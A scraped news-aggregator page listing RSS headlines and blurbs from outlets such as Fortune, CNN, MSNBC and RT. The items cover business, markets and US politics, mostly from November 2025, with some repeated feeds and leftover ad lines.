Date of publish: Thu, 30 May 2024 12:12:23 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 23 May 2024 13:26:48 +0000

Business

Article link

Date of publish: Thu, 23 May 2024 13:26:45 +0000

Politics

Article link

Date of publish: Thu, 23 May 2024 13:26:41 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 23 May 2024 11:20:02 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 16 May 2024 13:32:45 +0000

Business

Article link

Date of publish: Thu, 16 May 2024 13:32:44 +0000

Fortune | FORTUNE

Jamie Dimon says he still reads customer complaints himself because his staff filters too much: ‘The bureaucracy does want to control you’

“If you’re in a position like mine, you’ve got to break down those barriers all the time,” Dimon said.

Article link

Date of publish: Thu, 06 Nov 2025 17:19:19 +0000

Scott Galloway says he’s a product of big government: ‘Taking bets on unremarkable people pays off’

Galloway credits UCLA for his success, despite an initial rejection: “California taxpayers and the regents of the University of California saved my ass.”

Article link

Date of publish: Thu, 06 Nov 2025 16:05:56 +0000

For Gen Z, it’s ‘not enough to work hard’ if you want to succeed, says Jamie Dimon—specific skills are the way to get ahead

“In the old days, you could be in 10th grade, go get a factory job in Detroit, and eventually you could afford a family, a home, a car, and that may not be true anymore,” Dimon said.

Article link

Date of publish: Thu, 06 Nov 2025 16:01:04 +0000

Elon Musk is officially on the trillionaire path as Tesla shareholders approve an unprecedented $1 trillion pay package

Musk’s net worth could soon top $1 trillion as Tesla reaffirms its desire for the world’s richest man to lead the electric-vehicle company.

Article link

Date of publish: Thu, 06 Nov 2025 22:03:45 +0000

Laid off? Tech recruiting exec shares 4 tips for getting back on your feet—and on the job market

The tech industry is going through a purge.

Article link

Date of publish: Thu, 06 Nov 2025 21:55:02 +0000

Gen Z’s brains are ‘growing around their phones’ the way a tree warps around a tombstone, ‘Anxious Generation’ author warns

Speaking at a Dartmouth symposium on mental health, NYU professor Jonathan Haidt discussed his research on “the great rewiring.”

Article link

Date of publish: Thu, 06 Nov 2025 15:00:00 +0000

Jamie Dimon predicts AI will shorten the workweek: ‘My guess is the developed world be working three-and-a-half days a week’

He thinks it’ll eliminate jobs, but we can steer our way out of disaster.

Article link

Date of publish: Thu, 06 Nov 2025 20:46:32 +0000

Boeing won’t face a criminal conspiracy charge over two 737 Max jetliner crashes that killed 346 people

As part of a deal to drop the charge, the American aerospace company has agreed to pay or invest an additional $1.1 billion in fines.

Article link

Date of publish: Thu, 06 Nov 2025 20:40:51 +0000

Nancy Pelosi retires from legendary career as Obama hails ‘one of the best speakers the House of Representatives has ever had’

“I will not be seeking reelection to Congress,” Pelosi said in a video address to voters.

Article link

Date of publish: Thu, 06 Nov 2025 20:19:47 +0000

Zohran Mamdani is New York’s first millennial Mayor—experts share how the young leader’s style will differ from his boomer predecessors

Higher minimum wage for young workers, remote working and a 4-day workweek could get a spotlight thanks to New York’s first millennial Mayor

Article link

Date of publish: Thu, 06 Nov 2025 17:29:56 +0000

Business

All News

Musk’s $1 trillion Tesla pay package approved by shareholders

Article link

Date of publish: 2025-11-06 22:23:51

Retail darling Opendoor plummets on Q3 miss, management’s cautious guidance

Article link

Date of publish: 2025-11-06 22:12:56

Stock market today: S&P 500 falls as job cuts stoke economic fears, tech stutters

Article link

Date of publish: 2025-11-06 22:07:28

Take-Two falls in afterhours as further delay to GTA VI offsets guidance hike

Article link

Date of publish: 2025-11-06 21:56:36

Affirm stock bounces as Q1 earnings smash expectations

Article link

Date of publish: 2025-11-06 21:44:33

A-Mark reports Q1 loss; announces acquisition, name and listing change

Article link

Date of publish: 2025-11-06 21:37:20

Airbnb Q3 earnings miss, but guidance beat estimates as travel demand picks up

Article link

Date of publish: 2025-11-06 21:29:25

Sandisk soars as earnings beat and guidance surge past expectations

Article link

Date of publish: 2025-11-06 21:26:33

Block shares tumble as Q3 earnings miss estimates; company raises guidance

Article link

Date of publish: 2025-11-06 21:19:33

The Trade Desk beats estimates as revenue grows 18% YoY; shares down

Article link

Date of publish: 2025-11-06 21:10:48

Whitestone confirms MCB offer, Green Street says bid ‘worth serious consideration’

Article link

Date of publish: 2025-11-06 19:57:47

Fed’s Miran expects December rate cut despite dissenting views

Article link

Date of publish: 2025-11-06 18:06:54

NCR Voyix tops profit estimates; shares slip despite Chipotle deal renewal

Article link

Date of publish: 2025-11-06 18:06:10

TSX falls after index logs biggest gain in three weeks

Article link

Date of publish: 2025-11-06 17:56:09

Euronext posts 6th straight quarter of double-digit growth

Article link

Date of publish: 2025-11-06 17:48:02

BillionToOne shares soar 67% in Nasdaq debut, valuing firm at $4.4 billion

Article link

Date of publish: 2025-11-06 17:47:34

Fed independence crucial for U.S. and global economy, says Williams

Article link

Date of publish: 2025-11-06 17:35:37

European stocks fall; earnings, Bank of England decision in spotlight

Article link

Date of publish: 2025-11-06 17:23:14

Fed’s Hammack opposes further rate cuts amid inflation concerns

Article link

Date of publish: 2025-11-06 17:02:35

Aeromexico shares edge higher in NYSE debut

Article link

Date of publish: 2025-11-06 16:59:30

Challenger job-cut report sparks selloff amid absence of government data

Article link

Date of publish: 2025-11-06 16:15:22

KeyBanc downgrades Duolingo after weak growth outlook

Article link

Date of publish: 2025-11-06 16:02:55

Piper Sandler cuts e.l.f. Beauty, sees slowing core growth and margin pressure

Article link

Date of publish: 2025-11-06 15:32:46

Bitcoin price today: edges lower to $102k as risk appetite remains frail

Article link

Date of publish: 2025-11-06 15:09:24

BofA double-upgrades DigitalOcean, says ’AI inferencing demand creates tailwinds’

Article link

Date of publish: 2025-11-06 14:32:07

Possible removal of Trump tariffs not a "bullish gamechanger" - Sevens Report

Article link

Date of publish: 2025-11-06 14:17:09

Expect a concentrated rally into year-end, Wolfe says

Article link

Date of publish: 2025-11-06 14:05:12

Gold prices gains; U.S. shutdown uncertainty lend support

Article link

Date of publish: 2025-11-06 13:54:10

Novavax beats revenue estimates, raises full-year guidance

Article link

Date of publish: 2025-11-06 13:31:57

DraftKings stock soars after ESPN partnership, replacing Penn Entertainment

Article link

Date of publish: 2025-11-06 13:14:11

JPMorgan expects retail traders to keep buying stocks into next year

Article link

Date of publish: 2025-11-06 13:10:20

Sonos climbs after Morgan Stanley upgrade, says tariff fears ‘overblown’

Article link

Date of publish: 2025-11-06 13:02:26

European chemical sector sees increased short positioning in October: UBS

Article link

Date of publish: 2025-11-06 13:02:24

Snap, Lyft, Moderna and Datadog rise premarket; Qualcomm falls

Article link

Date of publish: 2025-11-06 12:50:21

CarMax stock tumbles after CEO exit and weak preliminary results

Article link

Date of publish: 2025-11-06 12:46:06

JPMorgan flags slowdown in retail gold buying as prices retreat

Article link

Date of publish: 2025-11-06 12:42:43

Stifel lifts Biogen to Buy, sees potential Alzheimer’s narrative shift

Article link

Date of publish: 2025-11-06 12:28:55

Bumble loses its swipe appeal as RBC downgrades amid sector woes

Article link

Date of publish: 2025-11-06 12:21:54

Rockwell Automation shares rise 5% as fourth quarter earnings beat expectations

Article link

Date of publish: 2025-11-06 12:14:02

Datadog shares rally premarket as earnings and guidance beat expectations

Article link

Date of publish: 2025-11-06 12:11:05

Moderna revenue falls 45%, but still tops estimates

Article link

Date of publish: 2025-11-06 12:09:40

Under Armour beats fiscal Q2 forecasts, misses on profit outlook; new CFO unveiled

Article link

Date of publish: 2025-11-06 12:07:11

Bank of England holds key interest rate at 4% in a tight vote

Article link

Date of publish: 2025-11-06 12:02:10

Supreme Court oral arguments seen as "negative" for Trump levies - Wolfe Research

Article link

Date of publish: 2025-11-06 12:01:21

BCA explains why Mamdani will struggle to run NYC

Article link

Date of publish: 2025-11-06 11:57:45

Kepler Cheuvreux upgrades Nordea to “buy,” lifts target price on profit outlook

Article link

Date of publish: 2025-11-06 11:56:35

Coach parent Tapestry raises full-year earnings forecast

Article link

Date of publish: 2025-11-06 11:53:42

We told you first: These AI-picked stocks are up 20%+ in the first few days of November

Article link

Date of publish: 2025-11-06 11:45:48

Insulet shares rise 4% as Q3 results top estimates, company raises guidance

Article link

Date of publish: 2025-11-06 11:44:14

Becton Dickinson tops Q4 profit forecast, guides above consensus for 2026

Article link

Date of publish: 2025-11-06 11:43:21

Planet Fitness jumps as Q3 results top estimates, outlook raised

Article link

Date of publish: 2025-11-06 11:39:35

Bloomin’ Brands shares rise as turnaround strategy takes hold

Article link

Date of publish: 2025-11-06 11:38:23

YETI raises profit forecast, narrows sales outlook after Q3 beat

Article link

Date of publish: 2025-11-06 11:30:51

UBS double downgrades Georg Fischer to “sell” on prolonged market weakness

Article link

Date of publish: 2025-11-06 11:28:14

Celsius Holdings tumbles after Q3 results despite earnings beat

Article link

Date of publish: 2025-11-06 11:18:15

Air Products fourth-quarter income matches expectations

Article link

Date of publish: 2025-11-06 11:13:26

DuPont misses Q3 expectations, raises full-year EBITDA outlook

Article link

Date of publish: 2025-11-06 11:09:47

Snap shares jump 18% on earnings beat, deal with Perplexity AI

Article link

Date of publish: 2025-11-06 11:02:46

Telecom Italia reaffirms 2025 outlook as earnings, revenue rise

Article link

Date of publish: 2025-11-06 10:52:15

DoorDash slides 9% on earnings miss and higher spending plans

Article link

Date of publish: 2025-11-06 10:48:43

Heidelberg Materials shares down after mixed regional margins in Q3 results

Article link

Date of publish: 2025-11-06 10:43:55

Uniper stock slides after sharp earnings decline, guidance intact

Article link

Date of publish: 2025-11-06 10:34:26

Robinhood earnings top estimates on crypto trading boom; CFO set to retire

Article link

Date of publish: 2025-11-06 10:27:19

Qualcomm earnings top estimates but shares slip amid Samsung business worries

Article link

Date of publish: 2025-11-06 10:26:41

Mediobanca shares down after weak corporate, wealth units despite profit beat

Article link

Date of publish: 2025-11-06 10:13:11

Zalando delivers strong Q3 growth as active customers surpass 61 mln; shares surge

Article link

Date of publish: 2025-11-06 10:12:28

Oil prices rebound after recent losses; oversupply, demand concerns persist

Article link

Date of publish: 2025-11-06 09:48:57

AppLovin stock leaps after strong Q3 print and upbeat Q4 outlook

Article link

Date of publish: 2025-11-06 09:48:18

Arm shares jump after strong quarter driven by licensing momentum

Article link

Date of publish: 2025-11-06 09:42:51

Hikma shares tumble as company lowers medium-term growth outlook

Article link

Date of publish: 2025-11-06 09:36:07

Turkish Airlines strikes engine deal with GE Aerospace for 75 Boeing planes

Article link

Date of publish: 2025-11-06 09:33:45

Marvell shares spike amid report SoftBank explored possible takeover

Article link

Date of publish: 2025-11-06 09:30:06

Tate & Lyle shares rise as company exceeds cost synergy targets

Article link

Date of publish: 2025-11-06 09:28:07

We told you first: This AI-picked stock is up 30%+ in the first days of November

Article link

Date of publish: 2025-11-06 09:26:42

Henkel maintains 2025 guidance as Q3 sales rise modestly, shares climb

Article link

Date of publish: 2025-11-06 09:24:52

Auto Trader reports 5% revenue growth in first half of 2025

Article link

Date of publish: 2025-11-06 09:20:07

Diasorin slumps 16% after broad Q3 miss and trimmed forecast

Article link

Date of publish: 2025-11-06 09:16:35

A.P. Moller-Maersk raises lower end of core income outlook

Article link

Date of publish: 2025-11-06 09:14:25

Dollar corrects lower, while sterling gains ahead of BOE meeting

Article link

Date of publish: 2025-11-06 09:11:38

Air France-KLM shares tumble 12% after operating profit, sales miss

Article link

Date of publish: 2025-11-06 09:01:04

National Grid beats expectations with 6% rise in half-year earnings

Article link

Date of publish: 2025-11-06 09:00:09

Sainsbury’s lifts profit outlook as first-half sales and earnings rise

Article link

Date of publish: 2025-11-06 08:48:25

Continental posts quarterly loss after €1.1 bln restructuring charge

Article link

Date of publish: 2025-11-06 08:41:57

U.S. Supreme Court skepticism; Tesla shareholder vote - what’s moving markets

Article link

Date of publish: 2025-11-06 08:39:52

Smith+Nephew shares tumble as Q3 sales miss expectations

Article link

Date of publish: 2025-11-06 08:38:07

Engie Q3 EBIT misses estimates, full-year guidance reaffirmed at upper end

Article link

Date of publish: 2025-11-06 08:29:45

Rheinmetall’s Q3 sales, operating profit broadly in line, outlook reaffirmed

Article link

Date of publish: 2025-11-06 08:25:38

Watches of Switzerland shares surge as U.S. growth drives strong H1 performance

Article link

Date of publish: 2025-11-06 08:22:08

IMI shares surge as third quarter sales jump on strong energy demand

Article link

Date of publish: 2025-11-06 08:14:07

Wise shares fall 6.6% after reporting slowing revenue growth

Article link

Date of publish: 2025-11-06 08:10:07

Diageo trims sales and profit forecast amid weak U.S., China demand

Article link

Date of publish: 2025-11-06 08:03:20

Swisscom profit drops 23% as Vodafone Italia costs weigh on results

Article link

Date of publish: 2025-11-06 08:00:58

S4 Capital lowers revenue guidance but maintains EBITDA outlook

Article link

Date of publish: 2025-11-06 07:44:07

Legrand tumbles 11% as North America slowdown weighs on Q3 results

Article link

Date of publish: 2025-11-06 07:42:24

BT reports in-line earnings and revenue in second quarter, raises dividend

Article link

Date of publish: 2025-11-06 07:40:38

Vistry reaffirms profit growth forecast amid strengthening partner demand

Article link

Date of publish: 2025-11-06 07:32:09

AstraZeneca beats forecasts in Q3, reaffirms full-year guidance

Article link

Date of publish: 2025-11-06 07:29:36

Rational AG up 7% after reaffirming 2025 guidance, strong Q3 sales

Article link

Date of publish: 2025-11-06 07:25:39

Skanska posts higher Q3 profit despite US property impairments

Article link

Date of publish: 2025-11-06 07:21:09

Commerzbank unveils €1 bln buyback after record nine-month profit

Article link

Date of publish: 2025-11-06 07:05:29

ArcelorMittal Q3 net income drops 79%; net debt climbs to $9.1 bln

Article link

Date of publish: 2025-11-06 06:45:45

DHL Group free cash flow soars 80.8% in Q3 as profit margins expand

Article link

Date of publish: 2025-11-06 06:25:04

Zurich Insurance posts record premiums, strong capital position in first 9 months

Article link

Date of publish: 2025-11-06 06:01:34

Qingci Games signs licensing agreement with Disney, shares surge

Article link

Date of publish: 2025-11-06 05:32:34

Google in early talks to increase investment in Anthropic - Business Insider

Article link

Date of publish: 2025-11-06 04:37:26

Chinese chipmakers jump on report of foreign AI chip restrictions

Article link

Date of publish: 2025-11-06 03:42:40

Asia stocks rebound after tech-led selloff; Australia trade data in focus

Article link

Date of publish: 2025-11-06 03:14:49

Robotaxi rivals WeRide, Pony AI slide in Hong Kong market debut

Article link

Date of publish: 2025-11-06 03:12:21

Asia FX muted as dollar hits 3-mth high on cooling rate cut bets

Article link

Date of publish: 2025-11-06 02:48:16

Japanese stock pullback offers buying opportunity, UBS says

Article link

Date of publish: 2025-11-06 02:23:19

Cathay Pacific to buy back Qatar Airways’ 9.6% stake for $896 mln

Article link

Date of publish: 2025-11-06 01:40:35

FAA to cut thousands of US flights daily amid prolonged shutdown

Article link

Date of publish: 2025-11-06 01:19:19

Australia trade balance grows as expected in Sept as exports rebound sharply

Article link

Date of publish: 2025-11-06 00:52:01

OpenAI seeks government backing for AI chip investments

Article link

Date of publish: 2025-11-06 00:23:31

United Overseas Bank Q3 net profit slumps 72% as lower rates, provisions weigh

Article link

Date of publish: 2025-11-06 00:08:44

National Australia Bank FY profit disappoints on lower rates, high expenses

Article link

Date of publish: 2025-11-05 23:48:41

DBS Q3 profit falls 2% on lower interest rates, but still beats expectations

Article link

Date of publish: 2025-11-05 23:24:11

Duolingo shares tumble 20% as Q4 bookings guidance disappoints

Article link

Date of publish: 2025-11-05 22:59:33

Nvidia’s Huang warns China will win AI race amid energy costs, regulations

Article link

Date of publish: 2025-11-05 22:03:21

As JPMorgan’s Dimon warns of cockroaches in credit, MRB says kitchen still clean

Article link

Date of publish: 2025-11-05 21:56:56

TSX rises after index slumps to near six-week low in prior session

Article link

Date of publish: 2025-11-05 21:34:06

Stock market today: S&P 500 rises on dip buying in tech following recent selloff

Article link

Date of publish: 2025-11-05 21:05:15

Tesla’s $1 trillion question: Shareholders prepare to decide Musk’s future

Article link

Date of publish: 2025-11-05 20:32:21

Alphabet stock jumps after report of Apple’s plans to use Google AI for Siri

Article link

Date of publish: 2025-11-05 19:18:12

Here are the key policy proposals from Zohran Mamdani, mayor-elect of NYC

Article link

Date of publish: 2025-11-05 18:55:02

Randian Capital presses One Group to embrace franchise model ahead of earnings

Article link

Date of publish: 2025-11-05 18:31:03

BMO sees an attractive entry point in this lumber stock

Article link

Date of publish: 2025-11-05 18:30:21

Snam raises 2025 profit guidance, awaits German decision on OGE stake

Article link

Date of publish: 2025-11-05 18:23:55

Higher taxes in France and the UK are helping the USD rally, says Macquarie

Article link

Date of publish: 2025-11-05 17:52:11

Canada’s ‘Patience Budget’: Carney shifts spending to big-bet investments

Article link

Date of publish: 2025-11-05 17:46:07

AMD shares recover post earnings as AI spending boom alive and well

Article link

Date of publish: 2025-11-05 17:43:47

Leonardo reports strong order growth as new deals lift backlog

Article link

Date of publish: 2025-11-05 17:19:09

European stocks rise; Novo Nordisk announces job cuts

Article link

Date of publish: 2025-11-05 17:01:18

Odds fall for US Supreme Court ruling on Trump tariff legality

Article link

Date of publish: 2025-11-05 16:55:57

Evercore upgrades Yum Brands on plan to sell Pizza Hut

Article link

Date of publish: 2025-11-05 16:29:05

U.S. household debt rises 1% in Q3, student loan troubles increase

Article link

Date of publish: 2025-11-05 16:03:43

Jefferies downgrades Southern Co after Georgia election shifts state regulator bal

Article link

Date of publish: 2025-11-05 15:28:49

U.S.-listed XPeng shares fall as EV group eyes 2026 robotaxi launch

Article link

Date of publish: 2025-11-05 15:04:15

Bitcoin price today: dips to $103k, enters bear market amid valuation jitters

Article link

Date of publish: 2025-11-05 14:52:40

Mizuho upgrades Sarepta on confidence in Elevidys uptake

Article link

Date of publish: 2025-11-05 14:51:21

Pinterest shares plunge: Analyst cuts rating after ‘uninspiring’ Q3 results

Article link

Date of publish: 2025-11-05 14:43:37

Toyota Q2 profit drops 27% on US tariff hit, but upgrades FY outlook; shares dip

Article link

Date of publish: 2025-11-05 14:18:00

Bank of America unveils new growth targets at Investor Day, shares dip

Article link

Date of publish: 2025-11-05 14:09:30

Sonos jumps after narrower loss, revenue growth on speaker demand

Article link

Date of publish: 2025-11-05 14:02:16

O’Reilly Automotive upgraded at Raymond James after stock pullback

Article link

Date of publish: 2025-11-05 13:43:35

Gold prices rebound as risk-off mood grips markets

Article link

Date of publish: 2025-11-05 13:21:41

Want AI? BofA says buy these 2 non-tech sectors

Article link

Date of publish: 2025-11-05 13:21:28

U.S. Supreme Court likely to uphold Trump tariffs - Wolfe Research

Article link

Date of publish: 2025-11-05 13:14:15

Sabre misses Q3 earnings estimates, shares tumble on weak profit

Article link

Date of publish: 2025-11-05 13:09:30

Essilor stock target lifted at Morgan Stanley on smart-glasses potential

Article link

Date of publish: 2025-11-05 12:58:11

Politics RSS

Political sites below.

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

MSNBC Top Stories

Supreme Court majority lets Trump administration enforce new gender policy for passports

The Supreme Court’s Republican-appointed majority has agreed to let the Trump administration implement its new passport policy, which has been opposed by a group of transgender and nonbinary Americans.“Displaying passport holders’ sex at birth no more offends equal protection principles than displaying their country of birth — in both cases, the Government is merely attesting to a historical fact without subjecting anyone to differential treatment,” the majority wrote Thursday

Article link

Date of publish: Thu, 06 Nov 2025 20:33:12 GMT

Kari Lake gives Viktor Orban a major gift ahead of Trump meeting

Kari Lake, the failed politician and MAGA loyalist leading the U.S.

Article link

Date of publish: Thu, 06 Nov 2025 21:08:13 GMT

Jury finds D.C. sandwich thrower Sean Dunn not guilty of misdemeanor assault

Sean Dunn was found not guilty by a Washington, D.C., jury of a misdemeanor charge of assaulting a federal officer with a sandwich, The Associated Press reported.

Article link

Date of publish: Thu, 06 Nov 2025 19:31:50 GMT

RT - Daily news

Elon Musk gets $1 trillion pay package approved

Preview Tesla shareholders have approved an unprecedented compensation package for CEO Elon Musk, potentially worth up to $1 trillion
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 22:46:08 +0000

Russia marks liberation of Kiev from Nazis

Preview Russia commemorated the 82nd anniversary of the Red Army’s liberation of Kiev from Nazi forces on Thursday
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 22:26:40 +0000

Pharma rep collapses as Trump announces drug price cuts (VIDEO)

Preview The US president has announced a new deal that would lower the price of some weight loss medications
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 22:03:15 +0000

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

The Axe Files with David Axelrod

Go beyond the soundbites and get to know some of the most interesting players in politics.

Article link

Margins of Error

Look closely at almost anything and you'll find data—lots of it. But what are those numbers really saying about who we are and what we believe? Harry Enten is on a mission to find out.

Article link

The notable legal clouds that continue to hang over Donald Trump

All eyes are on former President Donald Trump, who has launched another White House bid.

Article link

Date of publish: Thu, 08 Dec 2022 03:36:24 GMT

The fine print of the Respect for Marriage Act

Let's start with the positive: Republicans and Democrats are coming together to protect same-sex marriage from the Supreme Court.

Article link

Date of publish: Tue, 29 Nov 2022 23:32:13 GMT

Everything you need to know about Biden's student loan forgiveness program

President Joe Biden's federal student loan forgiveness program, which promises to deliver up to $20,000 of debt relief for millions of borrowers, is on hold indefinitely as legal challenges work their way through the courts.

Article link

Date of publish: Tue, 13 Jun 2023 20:58:58 GMT

Politics of the Day

Politics of the Day

Article link

Date of publish: Fri, 14 Jun 2024 04:13:26 GMT

0% intro APR until 2024 is 100% insane
It's official: now avoid credit card interest into 2024
Experts: this is the best cash back card of 2022
Turn Your Rising Home Equity Into Cash You Can Use
Dream Big with a Home Equity Loan
Want Cash Out of Your Home? Here Are Your Best Options
Use the Right Card for Holiday Gifts (Save Hundreds on Interest)
10 Cards Charging 0% Interest Until 2024
Get a $200 Cash Back Bonus on Holiday Gift Buying
Array

Vice President Kamala Harris, a former US senator from California who previously served as the state's attorney general, could be the first Black woman and Asian American to lead a major party ticket after receiving President Joe Biden's support to become the next Democratic presidential nominee.

Article link

Array

Fareed explains why AI's massive energy demands are straining the power grid, but also why AI could enable big breakthroughs in sustainability and clean energy.

Article link

Array

In the wake of the Republican National Convention earlier this month, Fareed speaks with historian Niall Ferguson about how and why the modern-day GOP has changed since the Reagan era of the 1980s.

Article link

Array

Fareed speaks with New York Times opinion columnist Ezra Klein about the significance of Vice President Kamala Harris' early career as a prosecutor — and how it may affect her campaign.

Article link

Array

New York Times opinion columnist Ezra Klein speaks with Fareed about the effects of President Joe Biden's decision to not seek reelection — and whether Vice President Kamala Harris can reshape the race.

Article link

Array

CNN Senior Political Commentator Scott Jennings and Political Commentators Kristen Soltis Anderson, Jamal Simmons and Kate Bedingfield tell CNN's Jake Tapper who they think should join Vice President Kamala Harris' ticket and with 100 days until election day, the state of the 2024 presidential race.

Article link

Array

On CNN's State of the Union, Republican Sen. Tom Cotton criticizes Harris' comments on the war in Gaza and calls her a "San Francisco liberal who cannot keep this country safe."

Article link

Array

Years before he became president, many Americans first met Barack Obama during the 2004 Democratic National Convention.

Article link

Array

Joe Biden, the 46th president of the United States, announced on Sunday, July 21, that he is not seeking reelection.

Article link

Array

Fareed is joined by Jane Gilbert, chief heat officer for Miami-Dade County, Fla., who discusses how she is working to combat the effects of record high temperatures in a county that is considered ground zero for the climate crisis in the United States.

Article link

Array

Fareed speaks with David Frum, staff writer at The Atlantic, about how Sen. JD Vance went from being a fierce critic of Donald Trump to becoming the former president's running mate.

Article link

Array

Colorado Gov. Jared Polis tells CNN's Jake Tapper that Biden needs to show Democrats that he can turn his campaign around and says "he hasn't done that yet."

Article link

MSNBC Top Stories

Supreme Court majority lets Trump administration enforce new gender policy for passports

The Supreme Court’s Republican-appointed majority has agreed to let the Trump administration implement its new passport policy, which has been opposed by a group of transgender and nonbinary Americans.“Displaying passport holders’ sex at birth no more offends equal protection principles than displaying their country of birth — in both cases, the Government is merely attesting to a historical fact without subjecting anyone to differential treatment,” the majority wrote Thursday

Article link

Date of publish: Thu, 06 Nov 2025 20:33:12 GMT

Kari Lake gives Viktor Orban a major gift ahead of Trump meeting

Kari Lake, the failed politician and MAGA loyalist leading the U.S.

Article link

Date of publish: Thu, 06 Nov 2025 21:08:13 GMT

Jury finds D.C. sandwich thrower Sean Dunn not guilty of misdemeanor assault

Sean Dunn was found not guilty by a Washington, D.C., jury of a misdemeanor charge of assaulting a federal officer with a sandwich, The Associated Press reported.

Article link

Date of publish: Thu, 06 Nov 2025 19:31:50 GMT

Trump's latest golden addition cheapens the White House

The White House update of the Lincoln Bathroom and gold trim everywhere, along with a new Oval Office sign, contrast a collapse in Trump's fantasy of luxury.

Article link

Date of publish: Thu, 06 Nov 2025 21:22:21 GMT

Kash Patel’s girlfriend files defamation suit against suggestion she’s an Israeli spy

Kash Patel’s girlfriend Alexis Wilkins sued a failed U.S. Senate candidate in Utah who, she alleges, defamed her in suggesting that she’s a secret Israeli agent assigned to manipulate and compromise Donald Trump’s FBI director.

Article link

Date of publish: Thu, 06 Nov 2025 22:19:07 GMT

Marjorie Taylor Greene and Nancy Mace launch scathing attacks on MAGA masculinity

Prominent conservative women are laying waste to the MAGA patriarchy

Article link

Date of publish: Thu, 06 Nov 2025 11:00:00 GMT

DOJ preparing subpoenas in investigation into John Brennan

The DOJ is preparing to issue a series of grand jury subpoenas as part of an investigation into former CIA Director John Brennan and the probes into Russian election interference.

Article link

Date of publish: Thu, 06 Nov 2025 15:58:40 GMT

‘Dummymadering’: How the GOP’s redistricting push could backfire

Chris Hayes warns Trump and Republicans' redistricting push could backfire, after California greenlit Democratic-favored maps, and risk of "dummymadering" rises.

Article link

Date of publish: Thu, 06 Nov 2025 20:27:35 GMT

Mexican President Claudia Sheinbaum presses charges against man who groped her

Mexican President Claudia Sheinbaum has pressed charges against the man who publicly groped and tried to kiss her outside the National Palace in Mexico City

Article link

Date of publish: Thu, 06 Nov 2025 21:59:07 GMT

Trump's solicitor general stumbled at the Supreme Court. That may not matter.

At the Supreme Court, Solicitor General John Sauer struggled to justify President Donald Trump’s sweeping use of the tariff power.

Article link

Date of publish: Thu, 06 Nov 2025 11:00:00 GMT

Donald Trump keeps benefiting from the Supreme Court’s criminal immunity ruling

President Donald Trump just got a boost in his ongoing appeal of his New York state hush money conviction, thanks to the Supreme Court’s immunity ruling in his federal election interference case.

Article link

Date of publish: Thu, 06 Nov 2025 18:25:09 GMT

Breaking: Former Vice President Dick Cheney has passed away

Breaking: Former Vice President Dick Cheney has passed away

Article link

Date of publish: Tue, 04 Nov 2025 11:31:40 GMT

FAA-mandated flight reductions loom at nation's busiest airports

The Federal Aviation Administration will significantly reduce flight capacity at airports across the country beginning Friday amid the ongoing government shutdown.

Article link

Date of publish: Thu, 06 Nov 2025 19:09:31 GMT

Why Mike Johnson’s shutdown strategy is reaching its limit

This is now the longest federal shutdown in U.S. history. Democrats are debating how much to give in on Obamacare subsidies to bring the House GOP back to DC.

Article link

Date of publish: Wed, 05 Nov 2025 21:15:32 GMT

Trump's grotesque SNAP politicking exposes the truth about right-wing ‘populism'

Trump is trying to squirm his way out of paying SNAP benefits as a bargaining chip over the government shutdown.

Article link

Date of publish: Wed, 05 Nov 2025 23:33:08 GMT

Democrats won big on election night. Now they’re wondering if they can win the shutdown

A day after Democrats swept a series of off-year elections on Tuesday, Democratic senators have a complicated choice on the shutdown.

Article link

Date of publish: Thu, 06 Nov 2025 01:11:58 GMT

Trump’s private push to end the filibuster flops with GOP senators

President Donald Trump urged Republicans to end the filibuster to end the longest funding lapse in U.S. history.

Article link

Date of publish: Wed, 05 Nov 2025 21:36:00 GMT

With false claims about gas prices, Trump adds to his list of self-defeating lies

American consumers know that gas prices haven't “plummeted.” So why is Donald Trump trying to fool them into believing otherwise?

Article link

Date of publish: Thu, 06 Nov 2025 16:35:05 GMT

Trump to tap election denier for U.S. attorney in North Carolina

Donald Trump is planning to appoint a right-wing election denier to serve as a U.S. attorney in North Carolina.

Article link

Date of publish: Thu, 06 Nov 2025 21:03:35 GMT

JD Vance’s analysis of the 2025 elections has one obvious flaw

Assessing the Democrats' dominant wins in this week's elections, JD Vance saw little more than “a couple of elections in blue states.” That's not what happened.

Article link

Date of publish: Thu, 06 Nov 2025 14:50:30 GMT

The Trump administration’s war on drugs is turning out to be worse than the first one

President Trump's reported plans to send U.S. troops into Mexico to target drug cartels is part of a new war on drugs that be at least as bad as the first one.

Article link

Date of publish: Wed, 05 Nov 2025 22:58:08 GMT

Voters rejected Trump's influence in 7 key races

